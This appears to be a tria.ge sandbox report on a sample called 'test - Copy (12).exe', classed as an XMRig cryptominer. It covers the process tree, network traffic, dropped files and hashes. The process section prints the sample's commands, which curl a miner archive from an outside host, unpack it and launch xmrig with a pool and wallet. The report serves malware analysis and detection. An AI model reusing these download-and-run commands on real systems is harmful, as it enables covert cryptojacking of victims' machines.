Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

test - Copy (10).exe

windows10-2004-x64

10

test - Copy (11).exe

windows10-2004-x64

10

test - Copy (12).exe

windows10-2004-x64

10

test - Copy (13).exe

windows10-2004-x64

10

test - Copy (14).exe

windows10-2004-x64

10

test - Copy (2).exe

windows10-2004-x64

10

test - Copy (3).exe

windows10-2004-x64

10

test - Copy (4).exe

windows10-2004-x64

10

test - Copy (5).exe

windows10-2004-x64

10

test - Copy (6).exe

windows10-2004-x64

10

test - Copy (7).exe

windows10-2004-x64

10

test - Copy (8).exe

windows10-2004-x64

10

test - Copy (9).exe

windows10-2004-x64

10

test - Copy.exe

windows10-2004-x64

10

test.exe

windows10-2004-x64

10

Resubmissions

11/03/2024, 21:08 UTC

240311-zy7ywsed31 10

11/03/2024, 21:06 UTC

240311-zx53xagd73 10

11/03/2024, 21:02 UTC

240311-zvwrfsec3x 10

11/03/2024, 21:01 UTC

240311-ztxx5aeb9x 10

11/03/2024, 20:59 UTC

240311-zs72psgc56 10

11/03/2024, 20:57 UTC

240311-zrmpdaeb3v 10

11/03/2024, 20:56 UTC

240311-zqzbsagb66 10

11/03/2024, 20:55 UTC

240311-zqlexsgb55 10

11/03/2024, 20:54 UTC

240311-zp4j4sgb43 10

11/03/2024, 20:53 UTC

240311-zplz3agb32 10

Analysis

  • max time kernel
    1050s
  • max time network
    1065s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2024, 20:57 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    test - Copy (12).exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
10/10
xmrigminer

Malware Config

Signatures

  • XMRig Miner payload 61 IoCs
    miner
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy (12).exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy (12).exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5040
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\N4zfUuBD.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3684
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:4700
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:2476
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4404
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3956 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:208
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4284 --field-trial-handle=2356,i,13261194862334667799,7441241219475888176,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:3744

          Network

          • flag-us
            DNS
            14.160.190.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            14.160.190.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            1488.netlify.app
            curl.exe
            Remote address:
            8.8.8.8:53
            Request
            1488.netlify.app
            IN A
            Response
            1488.netlify.app
            IN A
            18.192.231.252
            1488.netlify.app
            IN A
            52.58.254.253
          • flag-us
            DNS
            95.221.229.192.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            95.221.229.192.in-addr.arpa
            IN PTR
            Response
          • flag-de
            GET
            https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
            curl.exe
            Remote address:
            18.192.231.252:443
            Request
            GET /xmrig-6.21.1-gcc-win64.zip HTTP/1.1
            Host: 1488.netlify.app
            User-Agent: curl/7.55.1
            Accept: */*
            Response
            HTTP/1.1 200 OK
            Accept-Ranges: bytes
            Age: 18647
            Cache-Control: public,max-age=0,must-revalidate
            Cache-Status: "Netlify Edge"; hit
            Content-Length: 3336525
            Content-Type: application/zip
            Date: Mon, 11 Mar 2024 20:57:35 GMT
            Etag: "3f561091cdba4bace650b26717533c91-ssl"
            Server: Netlify
            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
            X-Nf-Request-Id: 01HRQMWXYK8DXVDJBXH0S7KZ08
          • flag-us
            DNS
            217.106.137.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            217.106.137.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            252.231.192.18.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            252.231.192.18.in-addr.arpa
            IN PTR
            Response
            252.231.192.18.in-addr.arpa
            IN PTR
            ec2-18-192-231-252 eu-central-1compute amazonawscom
          • flag-us
            DNS
            241.154.82.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            241.154.82.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            193.78.101.95.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            193.78.101.95.in-addr.arpa
            IN PTR
            Response
            193.78.101.95.in-addr.arpa
            IN PTR
            a95-101-78-193deploystaticakamaitechnologiescom
          • flag-us
            DNS
            195.233.44.23.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            195.233.44.23.in-addr.arpa
            IN PTR
            Response
            195.233.44.23.in-addr.arpa
            IN PTR
            a23-44-233-195deploystaticakamaitechnologiescom
          • flag-us
            DNS
            195.233.44.23.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            195.233.44.23.in-addr.arpa
            IN PTR
          • flag-us
            DNS
            79.121.231.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            79.121.231.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            79.121.231.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            79.121.231.20.in-addr.arpa
            IN PTR
          • flag-us
            DNS
            g.bing.com
            Remote address:
            8.8.8.8:53
            Request
            g.bing.com
            IN A
            Response
            g.bing.com
            IN CNAME
            g-bing-com.a-0001.a-msedge.net
            g-bing-com.a-0001.a-msedge.net
            IN CNAME
            dual-a-0001.a-msedge.net
            dual-a-0001.a-msedge.net
            IN A
            204.79.197.200
            dual-a-0001.a-msedge.net
            IN A
            13.107.21.200
          • flag-us
            GET
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
            Remote address:
            204.79.197.200:443
            Request
            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            set-cookie: MUID=071EBB43B11661412F85AF7CB0F660C5; domain=.bing.com; expires=Sat, 05-Apr-2025 20:57:45 GMT; path=/; SameSite=None; Secure; Priority=High;
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: FBD5B47C918045C4BFDBF81D9B93B8A2 Ref B: LON04EDGE1215 Ref C: 2024-03-11T20:57:45Z
            date: Mon, 11 Mar 2024 20:57:45 GMT
          • flag-us
            GET
            https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
            Remote address:
            204.79.197.200:443
            Request
            GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            cookie: MUID=071EBB43B11661412F85AF7CB0F660C5
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            set-cookie: MSPTC=vvmIW0DUfMzvmHueQUdjrnPF8B8HMo5XTZqSgDgkvaY; domain=.bing.com; expires=Sat, 05-Apr-2025 20:57:45 GMT; path=/; Partitioned; secure; SameSite=None
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 17F112E85F5A48EC8B71FCD689E4674A Ref B: LON04EDGE1215 Ref C: 2024-03-11T20:57:45Z
            date: Mon, 11 Mar 2024 20:57:45 GMT
          • flag-us
            GET
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
            Remote address:
            204.79.197.200:443
            Request
            GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid= HTTP/2.0
            host: g.bing.com
            accept-encoding: gzip, deflate
            user-agent: WindowsShellClient/9.0.40929.0 (Windows)
            cookie: MUID=071EBB43B11661412F85AF7CB0F660C5; MSPTC=vvmIW0DUfMzvmHueQUdjrnPF8B8HMo5XTZqSgDgkvaY
            Response
            HTTP/2.0 204
            cache-control: no-cache, must-revalidate
            pragma: no-cache
            expires: Fri, 01 Jan 1990 00:00:00 GMT
            strict-transport-security: max-age=31536000; includeSubDomains; preload
            access-control-allow-origin: *
            x-cache: CONFIG_NOCACHE
            accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
            x-msedge-ref: Ref A: 2E8EF6F3B8E54CA2A62DBF0FE10A514A Ref B: LON04EDGE1215 Ref C: 2024-03-11T20:57:45Z
            date: Mon, 11 Mar 2024 20:57:45 GMT
          • flag-us
            DNS
            200.197.79.204.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            200.197.79.204.in-addr.arpa
            IN PTR
            Response
            200.197.79.204.in-addr.arpa
            IN PTR
            a-0001a-msedgenet
          • flag-us
            DNS
            xmr.2miners.com
            xmrig.exe
            Remote address:
            8.8.8.8:53
            Request
            xmr.2miners.com
            IN A
            Response
            xmr.2miners.com
            IN A
            162.19.139.184
          • flag-us
            DNS
            184.139.19.162.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            184.139.19.162.in-addr.arpa
            IN PTR
            Response
            184.139.19.162.in-addr.arpa
            IN PTR
            p062minerscom
          • flag-us
            DNS
            21.53.126.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            21.53.126.40.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            13.86.106.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            13.86.106.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            103.169.127.40.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            103.169.127.40.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            15.164.165.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            15.164.165.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            140.71.91.104.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            140.71.91.104.in-addr.arpa
            IN PTR
            Response
            140.71.91.104.in-addr.arpa
            IN PTR
            a104-91-71-140deploystaticakamaitechnologiescom
          • flag-us
            DNS
            140.71.91.104.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            140.71.91.104.in-addr.arpa
            IN PTR
          • flag-us
            DNS
            209.178.17.96.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            209.178.17.96.in-addr.arpa
            IN PTR
            Response
            209.178.17.96.in-addr.arpa
            IN PTR
            a96-17-178-209deploystaticakamaitechnologiescom
          • flag-us
            DNS
            19.229.111.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            19.229.111.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            176.178.17.96.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            176.178.17.96.in-addr.arpa
            IN PTR
            Response
            176.178.17.96.in-addr.arpa
            IN PTR
            a96-17-178-176deploystaticakamaitechnologiescom
          • flag-us
            DNS
            15.173.189.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            15.173.189.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            149.220.183.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            149.220.183.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            149.220.183.52.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            149.220.183.52.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            183.142.211.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            183.142.211.20.in-addr.arpa
            IN PTR
            Response
          • flag-us
            DNS
            183.142.211.20.in-addr.arpa
            Remote address:
            8.8.8.8:53
            Request
            183.142.211.20.in-addr.arpa
            IN PTR
            Response
          • 142.250.178.10:443
            46 B
             40 B
             1
            1
          • 18.192.231.252:443
            https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
            tls, http
            curl.exe
            78.8kB
             3.5MB
             1628
            2707

            HTTP Request

            GET https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip

            HTTP Response

            200
          • 204.79.197.200:443
            https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=
            tls, http2
            2.0kB
             9.3kB
             21
            20

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

            HTTP Response

            204

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

            HTTP Response

            204

            HTTP Request

            GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=8c8bda9c3843499ea8c00f67932bec6d&localId=w:AE07C56D-9F7E-DB3B-D18D-2459C76F841B&deviceId=6825825924912662&anid=

            HTTP Response

            204
          • 162.19.139.184:2222
            xmr.2miners.com
            xmrig.exe
            5.8kB
             21.7kB
             109
            108
          • 13.107.253.64:443
            368 B
             8
          • 8.8.8.8:53
            14.160.190.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            14.160.190.20.in-addr.arpa

          • 8.8.8.8:53
            1488.netlify.app
            dns
            curl.exe
            62 B
             94 B
             1
            1

            DNS Request

            1488.netlify.app

            DNS Response

            18.192.231.252
            52.58.254.253

          • 8.8.8.8:53
            95.221.229.192.in-addr.arpa
            dns
            73 B
             144 B
             1
            1

            DNS Request

            95.221.229.192.in-addr.arpa

          • 8.8.8.8:53
            217.106.137.52.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            217.106.137.52.in-addr.arpa

          • 8.8.8.8:53
            252.231.192.18.in-addr.arpa
            dns
            73 B
             140 B
             1
            1

            DNS Request

            252.231.192.18.in-addr.arpa

          • 8.8.8.8:53
            241.154.82.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            241.154.82.20.in-addr.arpa

          • 8.8.8.8:53
            193.78.101.95.in-addr.arpa
            dns
            72 B
             137 B
             1
            1

            DNS Request

            193.78.101.95.in-addr.arpa

          • 8.8.8.8:53
            195.233.44.23.in-addr.arpa
            dns
            144 B
             137 B
             2
            1

            DNS Request

            195.233.44.23.in-addr.arpa

            DNS Request

            195.233.44.23.in-addr.arpa

          • 8.8.8.8:53
            79.121.231.20.in-addr.arpa
            dns
            144 B
             158 B
             2
            1

            DNS Request

            79.121.231.20.in-addr.arpa

            DNS Request

            79.121.231.20.in-addr.arpa

          • 8.8.8.8:53
            g.bing.com
            dns
            56 B
             158 B
             1
            1

            DNS Request

            g.bing.com

            DNS Response

            204.79.197.200
            13.107.21.200

          • 8.8.8.8:53
            200.197.79.204.in-addr.arpa
            dns
            73 B
             106 B
             1
            1

            DNS Request

            200.197.79.204.in-addr.arpa

          • 8.8.8.8:53
            xmr.2miners.com
            dns
            xmrig.exe
            61 B
             77 B
             1
            1

            DNS Request

            xmr.2miners.com

            DNS Response

            162.19.139.184

          • 8.8.8.8:53
            184.139.19.162.in-addr.arpa
            dns
            73 B
             102 B
             1
            1

            DNS Request

            184.139.19.162.in-addr.arpa

          • 8.8.8.8:53
            21.53.126.40.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            21.53.126.40.in-addr.arpa

          • 8.8.8.8:53
            13.86.106.20.in-addr.arpa
            dns
            71 B
             157 B
             1
            1

            DNS Request

            13.86.106.20.in-addr.arpa

          • 8.8.8.8:53
            103.169.127.40.in-addr.arpa
            dns
            73 B
             147 B
             1
            1

            DNS Request

            103.169.127.40.in-addr.arpa

          • 8.8.8.8:53
            15.164.165.52.in-addr.arpa
            dns
            72 B
             146 B
             1
            1

            DNS Request

            15.164.165.52.in-addr.arpa

          • 8.8.8.8:53
            140.71.91.104.in-addr.arpa
            dns
            144 B
             137 B
             2
            1

            DNS Request

            140.71.91.104.in-addr.arpa

            DNS Request

            140.71.91.104.in-addr.arpa

          • 8.8.8.8:53
            209.178.17.96.in-addr.arpa
            dns
            72 B
             137 B
             1
            1

            DNS Request

            209.178.17.96.in-addr.arpa

          • 8.8.8.8:53
            19.229.111.52.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            19.229.111.52.in-addr.arpa

          • 8.8.8.8:53
            176.178.17.96.in-addr.arpa
            dns
            72 B
             137 B
             1
            1

            DNS Request

            176.178.17.96.in-addr.arpa

          • 8.8.8.8:53
            15.173.189.20.in-addr.arpa
            dns
            72 B
             158 B
             1
            1

            DNS Request

            15.173.189.20.in-addr.arpa

          • 8.8.8.8:53
            149.220.183.52.in-addr.arpa
            dns
            146 B
             294 B
             2
            2

            DNS Request

            149.220.183.52.in-addr.arpa

            DNS Request

            149.220.183.52.in-addr.arpa

          • 8.8.8.8:53
            183.142.211.20.in-addr.arpa
            dns
            146 B
             318 B
             2
            2

            DNS Request

            183.142.211.20.in-addr.arpa

            DNS Request

            183.142.211.20.in-addr.arpa

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\N4zfUuBD.bat
            Filesize

            421B

            MD5

            67d11b392feb0ad59fc11ff3e79dfeee

            SHA1

            7df5785988cb76c4893773614572c93baaa18717

            SHA256

            69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

            SHA512

            50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

            Download Submit

          • C:\xmrig\xmrig-6.21.1-gcc-win64.zip
            Filesize

            3.2MB

            MD5

            e27f13ffb2989f290f16f8edd1c80171

            SHA1

            352a34a66152f4998b8d9152356528f980de2ef5

            SHA256

            fa6214ad822c6a70ee064de975608438a55eac4de41a5bb20f7180895e0524f9

            SHA512

            549a1c129ba53006e664b710361b860f9fdd58dc4682b36733fd3d10c36aa80fb28610d47ec18a8e91dad55542a83b58f5df79a8b9928cbe851b3557fde2b06a

            Download Submit

          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            Filesize

            1.8MB

            MD5

            105de3a355fab5800947c5fdaa6521dc

            SHA1

            10a1b4046b6c2e8a9009dd73d7c32afccbd185a7

            SHA256

            a71ac843a50ad04690608f62f6a120c7c48a143fbbf3d104eefaf930bef14db5

            SHA512

            c71ab5e7b9cbb734609b9d9ce22a580727aef24c14cbaf4470a3c3b71013b6a651482189b4a2061704b5292cd2b8e4a2d415139fbcd5b8e90dee0ec334ce425a

            Download Submit

          • memory/4404-56-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-55-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-25-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-26-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-27-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-28-0x00000210009F0000-0x0000021000A10000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4404-29-0x0000021000A10000-0x0000021000A30000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4404-30-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-31-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-32-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-33-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-34-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-35-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-36-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-37-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-38-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-39-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-40-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-41-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-42-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-43-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-44-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-45-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-46-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-47-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-48-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-49-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-50-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-51-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-52-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-53-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-54-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-58-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-23-0x0000021000970000-0x0000021000990000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4404-24-0x00000210009D0000-0x00000210009F0000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4404-57-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-73-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-61-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-62-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-63-0x00000210009F0000-0x0000021000A10000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4404-64-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-65-0x0000021000A10000-0x0000021000A30000-memory.dmp

            Filesize

            128KB

            Download

          • memory/4404-66-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-67-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-68-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-69-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-70-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-71-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-72-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-59-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-74-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-75-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-76-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-77-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-78-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-79-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

          • memory/4404-80-0x00007FF733460000-0x00007FF733F64000-memory.dmp

            Filesize

            11.0MB

            Download

